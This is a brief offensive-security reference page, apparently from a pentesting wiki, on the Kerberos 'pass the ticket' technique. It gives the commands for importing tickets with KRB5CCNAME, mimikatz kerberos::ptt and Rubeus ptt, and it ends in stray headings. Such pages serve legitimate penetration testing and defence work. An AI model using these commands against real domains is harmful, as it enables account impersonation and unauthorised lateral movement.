Pass the ticket
A ticket can then be used to authenticate to a system using Kerberos without knowing any password. This is called Pass the ticket.
Once a ticket is obtained/created, it needs to be referenced in the KRB5CCNAME environment variable for it to be used by others tools.
Import tickets
Linux
export KRB5CCNAME=$path_to_ticket.ccacheWindows
# With mimikatz
# use a .kirbi file
kerberos::ptt $ticket_kirbi_file
# use a .ccache file
kerberos::ptt $ticket_ccache_file
# With Rubeus
Rubeus.exe ptt /ticket:"base64 | file.kirbi"Pass the ticket
Linux
Last updated